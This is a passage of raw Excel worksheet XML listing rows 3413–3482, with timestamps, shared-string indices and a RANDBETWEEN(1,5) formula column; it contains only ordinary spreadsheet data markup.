      </c>
    </row>
    <row r="3413" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3413" s="1">
        <v>43494.427858796298</v>
      </c>
      <c r="B3413" t="s">
        <v>19</v>
      </c>
      <c r="C3413" t="s">
        <v>10</v>
      </c>
      <c r="D3413" t="s">
        <v>158</v>
      </c>
      <c r="E3413" t="s">
        <v>3325</v>
      </c>
      <c r="F3413">
        <f t="shared" ca="1" si="53"/>
        <v>4</v>
      </c>
    </row>
    <row r="3414" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3414" s="1">
        <v>43494.422569444447</v>
      </c>
      <c r="B3414" t="s">
        <v>5</v>
      </c>
      <c r="C3414" t="s">
        <v>253</v>
      </c>
      <c r="E3414" t="s">
        <v>3326</v>
      </c>
      <c r="F3414">
        <f t="shared" ca="1" si="53"/>
        <v>2</v>
      </c>
    </row>
    <row r="3415" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3415" s="1">
        <v>43494.410439814812</v>
      </c>
      <c r="B3415" t="s">
        <v>5</v>
      </c>
      <c r="C3415" t="s">
        <v>63</v>
      </c>
      <c r="E3415" t="s">
        <v>3327</v>
      </c>
      <c r="F3415">
        <f t="shared" ca="1" si="53"/>
        <v>4</v>
      </c>
    </row>
    <row r="3416" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3416" s="1">
        <v>43494.406828703701</v>
      </c>
      <c r="B3416" t="s">
        <v>19</v>
      </c>
      <c r="C3416" t="s">
        <v>10</v>
      </c>
      <c r="D3416" t="s">
        <v>89</v>
      </c>
      <c r="E3416" s="2" t="s">
        <v>3328</v>
      </c>
      <c r="F3416">
        <f t="shared" ca="1" si="53"/>
        <v>1</v>
      </c>
    </row>
    <row r="3417" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3417" s="1">
        <v>43494.405509259261</v>
      </c>
      <c r="B3417" t="s">
        <v>19</v>
      </c>
      <c r="C3417" t="s">
        <v>65</v>
      </c>
      <c r="E3417" s="2" t="s">
        <v>3329</v>
      </c>
      <c r="F3417">
        <f t="shared" ca="1" si="53"/>
        <v>1</v>
      </c>
    </row>
    <row r="3418" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3418" s="1">
        <v>43494.381469907406</v>
      </c>
      <c r="B3418" t="s">
        <v>13</v>
      </c>
      <c r="C3418" t="s">
        <v>2428</v>
      </c>
      <c r="D3418" t="s">
        <v>312</v>
      </c>
      <c r="F3418">
        <f t="shared" ca="1" si="53"/>
        <v>2</v>
      </c>
    </row>
    <row r="3419" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3419" s="1">
        <v>43494.377071759256</v>
      </c>
      <c r="B3419" t="s">
        <v>19</v>
      </c>
      <c r="C3419" t="s">
        <v>463</v>
      </c>
      <c r="D3419" t="s">
        <v>312</v>
      </c>
      <c r="E3419" t="s">
        <v>3330</v>
      </c>
      <c r="F3419">
        <f t="shared" ca="1" si="53"/>
        <v>4</v>
      </c>
    </row>
    <row r="3420" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3420" s="1">
        <v>43494.375914351855</v>
      </c>
      <c r="B3420" t="s">
        <v>13</v>
      </c>
      <c r="C3420" t="s">
        <v>623</v>
      </c>
      <c r="E3420" s="2" t="s">
        <v>3331</v>
      </c>
      <c r="F3420">
        <f t="shared" ca="1" si="53"/>
        <v>3</v>
      </c>
    </row>
    <row r="3421" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3421" s="1">
        <v>43494.375659722224</v>
      </c>
      <c r="B3421" t="s">
        <v>5</v>
      </c>
      <c r="C3421" t="s">
        <v>71</v>
      </c>
      <c r="E3421" s="2" t="s">
        <v>3332</v>
      </c>
      <c r="F3421">
        <f t="shared" ca="1" si="53"/>
        <v>3</v>
      </c>
    </row>
    <row r="3422" spans="1:6" ht="255" x14ac:dyDescent="0.25">
      <c r="A3422" s="1">
        <v>43494.352523148147</v>
      </c>
      <c r="B3422" t="s">
        <v>5</v>
      </c>
      <c r="C3422" t="s">
        <v>71</v>
      </c>
      <c r="E3422" s="2" t="s">
        <v>3333</v>
      </c>
      <c r="F3422">
        <f t="shared" ca="1" si="53"/>
        <v>5</v>
      </c>
    </row>
    <row r="3423" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3423" s="1">
        <v>43494.321412037039</v>
      </c>
      <c r="B3423" t="s">
        <v>19</v>
      </c>
      <c r="C3423" t="s">
        <v>10</v>
      </c>
      <c r="D3423" t="s">
        <v>80</v>
      </c>
      <c r="E3423" t="s">
        <v>3334</v>
      </c>
      <c r="F3423">
        <f t="shared" ca="1" si="53"/>
        <v>2</v>
      </c>
    </row>
    <row r="3424" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3424" s="1">
        <v>43494.315162037034</v>
      </c>
      <c r="B3424" t="s">
        <v>19</v>
      </c>
      <c r="C3424" t="s">
        <v>10</v>
      </c>
      <c r="D3424" t="s">
        <v>52</v>
      </c>
      <c r="E3424" t="s">
        <v>3335</v>
      </c>
      <c r="F3424">
        <f t="shared" ca="1" si="53"/>
        <v>5</v>
      </c>
    </row>
    <row r="3425" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3425" s="1">
        <v>43494.314606481479</v>
      </c>
      <c r="B3425" t="s">
        <v>5</v>
      </c>
      <c r="C3425" t="s">
        <v>559</v>
      </c>
      <c r="E3425" s="2" t="s">
        <v>3336</v>
      </c>
      <c r="F3425">
        <f t="shared" ca="1" si="53"/>
        <v>3</v>
      </c>
    </row>
    <row r="3426" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A3426" s="1">
        <v>43494.311620370368</v>
      </c>
      <c r="B3426" t="s">
        <v>5</v>
      </c>
      <c r="C3426" t="s">
        <v>71</v>
      </c>
      <c r="E3426" s="2" t="s">
        <v>3337</v>
      </c>
      <c r="F3426">
        <f t="shared" ca="1" si="53"/>
        <v>4</v>
      </c>
    </row>
    <row r="3427" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A3427" s="1">
        <v>43494.304710648146</v>
      </c>
      <c r="B3427" t="s">
        <v>5</v>
      </c>
      <c r="C3427" t="s">
        <v>65</v>
      </c>
      <c r="E3427" s="2" t="s">
        <v>3338</v>
      </c>
      <c r="F3427">
        <f t="shared" ca="1" si="53"/>
        <v>4</v>
      </c>
    </row>
    <row r="3428" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A3428" s="1">
        <v>43494.295173611114</v>
      </c>
      <c r="B3428" t="s">
        <v>1305</v>
      </c>
      <c r="C3428" t="s">
        <v>65</v>
      </c>
      <c r="E3428" s="2" t="s">
        <v>3339</v>
      </c>
      <c r="F3428">
        <f t="shared" ca="1" si="53"/>
        <v>5</v>
      </c>
    </row>
    <row r="3429" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3429" s="1">
        <v>43494.273657407408</v>
      </c>
      <c r="B3429" t="s">
        <v>19</v>
      </c>
      <c r="C3429" t="s">
        <v>229</v>
      </c>
      <c r="E3429" s="2" t="s">
        <v>3340</v>
      </c>
      <c r="F3429">
        <f t="shared" ca="1" si="53"/>
        <v>2</v>
      </c>
    </row>
    <row r="3430" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3430" s="1">
        <v>43494.268379629626</v>
      </c>
      <c r="B3430" t="s">
        <v>19</v>
      </c>
      <c r="C3430" t="s">
        <v>48</v>
      </c>
      <c r="E3430" s="2" t="s">
        <v>3341</v>
      </c>
      <c r="F3430">
        <f t="shared" ca="1" si="53"/>
        <v>2</v>
      </c>
    </row>
    <row r="3431" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3431" s="1">
        <v>43494.267256944448</v>
      </c>
      <c r="B3431" t="s">
        <v>13</v>
      </c>
      <c r="C3431" t="s">
        <v>41</v>
      </c>
      <c r="E3431" s="2" t="s">
        <v>3342</v>
      </c>
      <c r="F3431">
        <f t="shared" ca="1" si="53"/>
        <v>3</v>
      </c>
    </row>
    <row r="3432" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A3432" s="1">
        <v>43494.267083333332</v>
      </c>
      <c r="B3432" t="s">
        <v>35</v>
      </c>
      <c r="C3432" t="s">
        <v>461</v>
      </c>
      <c r="E3432" s="2" t="s">
        <v>3343</v>
      </c>
      <c r="F3432">
        <f t="shared" ca="1" si="53"/>
        <v>1</v>
      </c>
    </row>
    <row r="3433" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3433" s="1">
        <v>43494.261203703703</v>
      </c>
      <c r="B3433" t="s">
        <v>19</v>
      </c>
      <c r="C3433" t="s">
        <v>253</v>
      </c>
      <c r="E3433" s="2" t="s">
        <v>3344</v>
      </c>
      <c r="F3433">
        <f t="shared" ca="1" si="53"/>
        <v>3</v>
      </c>
    </row>
    <row r="3434" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3434" s="1">
        <v>43494.258240740739</v>
      </c>
      <c r="B3434" t="s">
        <v>5</v>
      </c>
      <c r="C3434" t="s">
        <v>48</v>
      </c>
      <c r="E3434" t="s">
        <v>3345</v>
      </c>
      <c r="F3434">
        <f t="shared" ca="1" si="53"/>
        <v>2</v>
      </c>
    </row>
    <row r="3435" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A3435" s="1">
        <v>43494.246053240742</v>
      </c>
      <c r="B3435" t="s">
        <v>1305</v>
      </c>
      <c r="C3435" t="s">
        <v>71</v>
      </c>
      <c r="E3435" s="2" t="s">
        <v>3346</v>
      </c>
      <c r="F3435">
        <f t="shared" ca="1" si="53"/>
        <v>3</v>
      </c>
    </row>
    <row r="3436" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A3436" s="1">
        <v>43494.222673611112</v>
      </c>
      <c r="B3436" t="s">
        <v>5</v>
      </c>
      <c r="C3436" t="s">
        <v>48</v>
      </c>
      <c r="E3436" s="2" t="s">
        <v>3347</v>
      </c>
      <c r="F3436">
        <f t="shared" ca="1" si="53"/>
        <v>2</v>
      </c>
    </row>
    <row r="3437" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3437" s="1">
        <v>43494.219328703701</v>
      </c>
      <c r="B3437" t="s">
        <v>5</v>
      </c>
      <c r="C3437" t="s">
        <v>43</v>
      </c>
      <c r="E3437" s="2" t="s">
        <v>3348</v>
      </c>
      <c r="F3437">
        <f t="shared" ca="1" si="53"/>
        <v>4</v>
      </c>
    </row>
    <row r="3438" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3438" s="1">
        <v>43494.216006944444</v>
      </c>
      <c r="B3438" t="s">
        <v>13</v>
      </c>
      <c r="C3438" t="s">
        <v>124</v>
      </c>
      <c r="E3438" t="s">
        <v>3349</v>
      </c>
      <c r="F3438">
        <f t="shared" ca="1" si="53"/>
        <v>2</v>
      </c>
    </row>
    <row r="3439" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3439" s="1">
        <v>43494.213726851849</v>
      </c>
      <c r="B3439" t="s">
        <v>19</v>
      </c>
      <c r="C3439" t="s">
        <v>189</v>
      </c>
      <c r="E3439" t="s">
        <v>3350</v>
      </c>
      <c r="F3439">
        <f t="shared" ca="1" si="53"/>
        <v>2</v>
      </c>
    </row>
    <row r="3440" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3440" s="1">
        <v>43494.188750000001</v>
      </c>
      <c r="B3440" t="s">
        <v>5</v>
      </c>
      <c r="C3440" t="s">
        <v>60</v>
      </c>
      <c r="E3440" t="s">
        <v>3351</v>
      </c>
      <c r="F3440">
        <f t="shared" ca="1" si="53"/>
        <v>4</v>
      </c>
    </row>
    <row r="3441" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3441" s="1">
        <v>43494.187407407408</v>
      </c>
      <c r="B3441" t="s">
        <v>35</v>
      </c>
      <c r="C3441" t="s">
        <v>92</v>
      </c>
      <c r="D3441" t="s">
        <v>92</v>
      </c>
      <c r="E3441" t="s">
        <v>3352</v>
      </c>
      <c r="F3441">
        <f t="shared" ca="1" si="53"/>
        <v>4</v>
      </c>
    </row>
    <row r="3442" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3442" s="1">
        <v>43494.177708333336</v>
      </c>
      <c r="B3442" t="s">
        <v>19</v>
      </c>
      <c r="C3442" t="s">
        <v>48</v>
      </c>
      <c r="E3442" t="s">
        <v>3353</v>
      </c>
      <c r="F3442">
        <f t="shared" ca="1" si="53"/>
        <v>4</v>
      </c>
    </row>
    <row r="3443" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3443" s="1">
        <v>43494.130555555559</v>
      </c>
      <c r="B3443" t="s">
        <v>5</v>
      </c>
      <c r="C3443" t="s">
        <v>60</v>
      </c>
      <c r="E3443" t="s">
        <v>3354</v>
      </c>
      <c r="F3443">
        <f t="shared" ca="1" si="53"/>
        <v>4</v>
      </c>
    </row>
    <row r="3444" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3444" s="1">
        <v>43494.115763888891</v>
      </c>
      <c r="B3444" t="s">
        <v>5</v>
      </c>
      <c r="C3444" t="s">
        <v>63</v>
      </c>
      <c r="E3444" s="2" t="s">
        <v>3355</v>
      </c>
      <c r="F3444">
        <f t="shared" ca="1" si="53"/>
        <v>2</v>
      </c>
    </row>
    <row r="3445" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3445" s="1">
        <v>43494.1018287037</v>
      </c>
      <c r="B3445" t="s">
        <v>5</v>
      </c>
      <c r="C3445" t="s">
        <v>60</v>
      </c>
      <c r="E3445" t="s">
        <v>3356</v>
      </c>
      <c r="F3445">
        <f t="shared" ca="1" si="53"/>
        <v>2</v>
      </c>
    </row>
    <row r="3446" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3446" s="1">
        <v>43494.100324074076</v>
      </c>
      <c r="B3446" t="s">
        <v>5</v>
      </c>
      <c r="C3446" t="s">
        <v>71</v>
      </c>
      <c r="E3446" t="s">
        <v>3357</v>
      </c>
      <c r="F3446">
        <f t="shared" ca="1" si="53"/>
        <v>5</v>
      </c>
    </row>
    <row r="3447" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A3447" s="1">
        <v>43494.09752314815</v>
      </c>
      <c r="B3447" t="s">
        <v>19</v>
      </c>
      <c r="C3447" t="s">
        <v>173</v>
      </c>
      <c r="E3447" s="2" t="s">
        <v>3358</v>
      </c>
      <c r="F3447">
        <f t="shared" ca="1" si="53"/>
        <v>5</v>
      </c>
    </row>
    <row r="3448" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3448" s="1">
        <v>43494.081979166665</v>
      </c>
      <c r="B3448" t="s">
        <v>19</v>
      </c>
      <c r="C3448" t="s">
        <v>10</v>
      </c>
      <c r="D3448" t="s">
        <v>89</v>
      </c>
      <c r="E3448" s="2" t="s">
        <v>3359</v>
      </c>
      <c r="F3448">
        <f t="shared" ca="1" si="53"/>
        <v>3</v>
      </c>
    </row>
    <row r="3449" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3449" s="1">
        <v>43494.051539351851</v>
      </c>
      <c r="B3449" t="s">
        <v>35</v>
      </c>
      <c r="C3449" t="s">
        <v>92</v>
      </c>
      <c r="D3449" t="s">
        <v>222</v>
      </c>
      <c r="E3449" t="s">
        <v>3360</v>
      </c>
      <c r="F3449">
        <f t="shared" ca="1" si="53"/>
        <v>5</v>
      </c>
    </row>
    <row r="3450" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3450" s="1">
        <v>43494.027615740742</v>
      </c>
      <c r="B3450" t="s">
        <v>13</v>
      </c>
      <c r="C3450" t="s">
        <v>10</v>
      </c>
      <c r="D3450" t="s">
        <v>6</v>
      </c>
      <c r="E3450" t="s">
        <v>616</v>
      </c>
      <c r="F3450">
        <f t="shared" ca="1" si="53"/>
        <v>1</v>
      </c>
    </row>
    <row r="3451" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3451" s="1">
        <v>43494.01326388889</v>
      </c>
      <c r="B3451" t="s">
        <v>5</v>
      </c>
      <c r="C3451" t="s">
        <v>318</v>
      </c>
      <c r="E3451" t="s">
        <v>3361</v>
      </c>
      <c r="F3451">
        <f t="shared" ca="1" si="53"/>
        <v>2</v>
      </c>
    </row>
    <row r="3452" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3452" s="1">
        <v>43494.002534722225</v>
      </c>
      <c r="B3452" t="s">
        <v>13</v>
      </c>
      <c r="C3452" t="s">
        <v>41</v>
      </c>
      <c r="E3452" s="2" t="s">
        <v>3362</v>
      </c>
      <c r="F3452">
        <f t="shared" ca="1" si="53"/>
        <v>1</v>
      </c>
    </row>
    <row r="3453" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3453" s="1">
        <v>43493.999386574076</v>
      </c>
      <c r="B3453" t="s">
        <v>35</v>
      </c>
      <c r="C3453" t="s">
        <v>60</v>
      </c>
      <c r="E3453" s="2" t="s">
        <v>3363</v>
      </c>
      <c r="F3453">
        <f t="shared" ca="1" si="53"/>
        <v>5</v>
      </c>
    </row>
    <row r="3454" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A3454" s="1">
        <v>43493.982511574075</v>
      </c>
      <c r="B3454" t="s">
        <v>5</v>
      </c>
      <c r="C3454" t="s">
        <v>10</v>
      </c>
      <c r="D3454" t="s">
        <v>6</v>
      </c>
      <c r="E3454" s="2" t="s">
        <v>3364</v>
      </c>
      <c r="F3454">
        <f t="shared" ca="1" si="53"/>
        <v>1</v>
      </c>
    </row>
    <row r="3455" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3455" s="1">
        <v>43493.977326388886</v>
      </c>
      <c r="B3455" t="s">
        <v>13</v>
      </c>
      <c r="C3455" t="s">
        <v>60</v>
      </c>
      <c r="E3455" s="2" t="s">
        <v>3365</v>
      </c>
      <c r="F3455">
        <f t="shared" ca="1" si="53"/>
        <v>1</v>
      </c>
    </row>
    <row r="3456" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3456" s="1">
        <v>43493.971238425926</v>
      </c>
      <c r="B3456" t="s">
        <v>5</v>
      </c>
      <c r="C3456" t="s">
        <v>454</v>
      </c>
      <c r="E3456" t="s">
        <v>3366</v>
      </c>
      <c r="F3456">
        <f t="shared" ca="1" si="53"/>
        <v>4</v>
      </c>
    </row>
    <row r="3457" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A3457" s="1">
        <v>43493.965520833335</v>
      </c>
      <c r="B3457" t="s">
        <v>13</v>
      </c>
      <c r="C3457" t="s">
        <v>314</v>
      </c>
      <c r="E3457" s="2" t="s">
        <v>3367</v>
      </c>
      <c r="F3457">
        <f t="shared" ca="1" si="53"/>
        <v>4</v>
      </c>
    </row>
    <row r="3458" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A3458" s="1">
        <v>43493.901493055557</v>
      </c>
      <c r="B3458" t="s">
        <v>35</v>
      </c>
      <c r="C3458" t="s">
        <v>408</v>
      </c>
      <c r="E3458" s="2" t="s">
        <v>3368</v>
      </c>
      <c r="F3458">
        <f t="shared" ref="F3458:F3521" ca="1" si="54">RANDBETWEEN(1,5)</f>
        <v>5</v>
      </c>
    </row>
    <row r="3459" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3459" s="1">
        <v>43493.896678240744</v>
      </c>
      <c r="B3459" t="s">
        <v>1305</v>
      </c>
      <c r="C3459" t="s">
        <v>454</v>
      </c>
      <c r="F3459">
        <f t="shared" ca="1" si="54"/>
        <v>4</v>
      </c>
    </row>
    <row r="3460" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3460" s="1">
        <v>43493.854409722226</v>
      </c>
      <c r="B3460" t="s">
        <v>19</v>
      </c>
      <c r="C3460" t="s">
        <v>10</v>
      </c>
      <c r="E3460" s="2" t="s">
        <v>3369</v>
      </c>
      <c r="F3460">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3461" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3461" s="1">
        <v>43493.850590277776</v>
      </c>
      <c r="B3461" t="s">
        <v>5</v>
      </c>
      <c r="C3461" t="s">
        <v>6</v>
      </c>
      <c r="D3461" t="s">
        <v>25</v>
      </c>
      <c r="E3461" s="2" t="s">
        <v>3370</v>
      </c>
      <c r="F3461">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3462" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3462" s="1">
        <v>43493.809525462966</v>
      </c>
      <c r="B3462" t="s">
        <v>19</v>
      </c>
      <c r="C3462" t="s">
        <v>10</v>
      </c>
      <c r="D3462" t="s">
        <v>6</v>
      </c>
      <c r="E3462" t="s">
        <v>3371</v>
      </c>
      <c r="F3462">
        <f t="shared" ca="1" si="54"/>
        <v>3</v>
      </c>
    </row>
    <row r="3463" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A3463" s="1">
        <v>43493.806192129632</v>
      </c>
      <c r="B3463" t="s">
        <v>19</v>
      </c>
      <c r="C3463" t="s">
        <v>10</v>
      </c>
      <c r="D3463" t="s">
        <v>374</v>
      </c>
      <c r="E3463" s="2" t="s">
        <v>3372</v>
      </c>
      <c r="F3463">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3464" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3464" s="1">
        <v>43493.732210648152</v>
      </c>
      <c r="B3464" t="s">
        <v>19</v>
      </c>
      <c r="C3464" t="s">
        <v>10</v>
      </c>
      <c r="D3464" t="s">
        <v>52</v>
      </c>
      <c r="E3464" s="2" t="s">
        <v>3373</v>
      </c>
      <c r="F3464">
        <f t="shared" ca="1" si="54"/>
        <v>2</v>
      </c>
    </row>
    <row r="3465" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3465" s="1">
        <v>43493.681747685187</v>
      </c>
      <c r="B3465" t="s">
        <v>35</v>
      </c>
      <c r="C3465" t="s">
        <v>10</v>
      </c>
      <c r="D3465" t="s">
        <v>14</v>
      </c>
      <c r="E3465" s="2" t="s">
        <v>3374</v>
      </c>
      <c r="F3465">
        <f t="shared" ca="1" si="54"/>
        <v>2</v>
      </c>
    </row>
    <row r="3466" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3466" s="1">
        <v>43493.665185185186</v>
      </c>
      <c r="B3466" t="s">
        <v>5</v>
      </c>
      <c r="C3466" t="s">
        <v>60</v>
      </c>
      <c r="E3466" t="s">
        <v>3375</v>
      </c>
      <c r="F3466">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3467" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3467" s="1">
        <v>43493.664074074077</v>
      </c>
      <c r="B3467" t="s">
        <v>5</v>
      </c>
      <c r="C3467" t="s">
        <v>6</v>
      </c>
      <c r="D3467" t="s">
        <v>194</v>
      </c>
      <c r="E3467" t="s">
        <v>3376</v>
      </c>
      <c r="F3467">
        <f t="shared" ca="1" si="54"/>
        <v>3</v>
      </c>
    </row>
    <row r="3468" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3468" s="1">
        <v>43493.661412037036</v>
      </c>
      <c r="B3468" t="s">
        <v>19</v>
      </c>
      <c r="C3468" t="s">
        <v>6</v>
      </c>
      <c r="D3468" t="s">
        <v>25</v>
      </c>
      <c r="E3468" t="s">
        <v>3377</v>
      </c>
      <c r="F3468">
        <f t="shared" ca="1" si="54"/>
        <v>2</v>
      </c>
    </row>
    <row r="3469" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3469" s="1">
        <v>43493.657673611109</v>
      </c>
      <c r="B3469" t="s">
        <v>5</v>
      </c>
      <c r="C3469" t="s">
        <v>10</v>
      </c>
      <c r="D3469" t="s">
        <v>89</v>
      </c>
      <c r="E3469" s="2" t="s">
        <v>3378</v>
      </c>
      <c r="F3469">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3470" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A3470" s="1">
        <v>43493.656504629631</v>
      </c>
      <c r="B3470" t="s">
        <v>5</v>
      </c>
      <c r="C3470" t="s">
        <v>10</v>
      </c>
      <c r="D3470" t="s">
        <v>33</v>
      </c>
      <c r="E3470" s="2" t="s">
        <v>3379</v>
      </c>
      <c r="F3470">
        <f t="shared" ca="1" si="54"/>
        <v>3</v>
      </c>
    </row>
    <row r="3471" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3471" s="1">
        <v>43493.645555555559</v>
      </c>
      <c r="B3471" t="s">
        <v>35</v>
      </c>
      <c r="C3471" t="s">
        <v>808</v>
      </c>
      <c r="D3471" t="s">
        <v>993</v>
      </c>
      <c r="E3471" t="s">
        <v>3380</v>
      </c>
      <c r="F3471">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3472" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3472" s="1">
        <v>43493.645532407405</v>
      </c>
      <c r="B3472" t="s">
        <v>5</v>
      </c>
      <c r="C3472" t="s">
        <v>10</v>
      </c>
      <c r="D3472" t="s">
        <v>263</v>
      </c>
      <c r="E3472" t="s">
        <v>3381</v>
      </c>
      <c r="F3472">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3473" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3473" s="1">
        <v>43493.637280092589</v>
      </c>
      <c r="B3473" t="s">
        <v>13</v>
      </c>
      <c r="C3473" t="s">
        <v>260</v>
      </c>
      <c r="F3473">
        <f t="shared" ca="1" si="54"/>
        <v>3</v>
      </c>
    </row>
    <row r="3474" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3474" s="1">
        <v>43493.617314814815</v>
      </c>
      <c r="B3474" t="s">
        <v>19</v>
      </c>
      <c r="C3474" t="s">
        <v>10</v>
      </c>
      <c r="D3474" t="s">
        <v>192</v>
      </c>
      <c r="E3474" t="s">
        <v>3382</v>
      </c>
      <c r="F3474">
        <f t="shared" ca="1" si="54"/>
        <v>4</v>
      </c>
    </row>
    <row r="3475" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3475" s="1">
        <v>43493.608240740738</v>
      </c>
      <c r="B3475" t="s">
        <v>19</v>
      </c>
      <c r="C3475" t="s">
        <v>10</v>
      </c>
      <c r="D3475" t="s">
        <v>20</v>
      </c>
      <c r="E3475" t="s">
        <v>3383</v>
      </c>
      <c r="F3475">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3476" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A3476" s="1">
        <v>43493.576898148145</v>
      </c>
      <c r="B3476" t="s">
        <v>5</v>
      </c>
      <c r="C3476" t="s">
        <v>6</v>
      </c>
      <c r="D3476" t="s">
        <v>821</v>
      </c>
      <c r="E3476" s="2" t="s">
        <v>3384</v>
      </c>
      <c r="F3476">
        <f t="shared" ca="1" si="54"/>
        <v>3</v>
      </c>
    </row>
    <row r="3477" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3477" s="1">
        <v>43493.557858796295</v>
      </c>
      <c r="B3477" t="s">
        <v>5</v>
      </c>
      <c r="C3477" t="s">
        <v>10</v>
      </c>
      <c r="D3477" t="s">
        <v>6</v>
      </c>
      <c r="E3477" t="s">
        <v>3385</v>
      </c>
      <c r="F3477">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3478" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3478" s="1">
        <v>43493.540011574078</v>
      </c>
      <c r="B3478" t="s">
        <v>19</v>
      </c>
      <c r="C3478" t="s">
        <v>10</v>
      </c>
      <c r="D3478" t="s">
        <v>36</v>
      </c>
      <c r="E3478" t="s">
        <v>3386</v>
      </c>
      <c r="F3478">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3479" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3479" s="1">
        <v>43493.536041666666</v>
      </c>
      <c r="B3479" t="s">
        <v>5</v>
      </c>
      <c r="C3479" t="s">
        <v>10</v>
      </c>
      <c r="D3479" t="s">
        <v>33</v>
      </c>
      <c r="E3479" t="s">
        <v>3387</v>
      </c>
      <c r="F3479">
        <f t="shared" ca="1" si="54"/>
        <v>4</v>
      </c>
    </row>
    <row r="3480" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3480" s="1">
        <v>43493.529722222222</v>
      </c>
      <c r="B3480" t="s">
        <v>1305</v>
      </c>
      <c r="C3480" t="s">
        <v>140</v>
      </c>
      <c r="D3480" t="s">
        <v>141</v>
      </c>
      <c r="F3480">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3481" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A3481" s="1">
        <v>43493.52648148148</v>
      </c>
      <c r="B3481" t="s">
        <v>1305</v>
      </c>
      <c r="C3481" t="s">
        <v>6</v>
      </c>
      <c r="D3481" t="s">
        <v>25</v>
      </c>
      <c r="E3481" s="2" t="s">
        <v>3388</v>
      </c>
      <c r="F3481">
        <f t="shared" ca="1" si="54"/>
        <v>1</v>
      </c>
    </row>
    <row r="3482" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A3482" s="1">
        <v>43493.508969907409</v>
      </c>
      <c r="B3482" t="s">
        <v>1305</v>
      </c>
      <c r="C3482" t="s">
        <v>10</v>
      </c>
      <c r="D3482" t="s">
        <v>6</v>
      </c>
      <c r="E3482" s="2" t="s">
        <v>3389</v>
      </c>
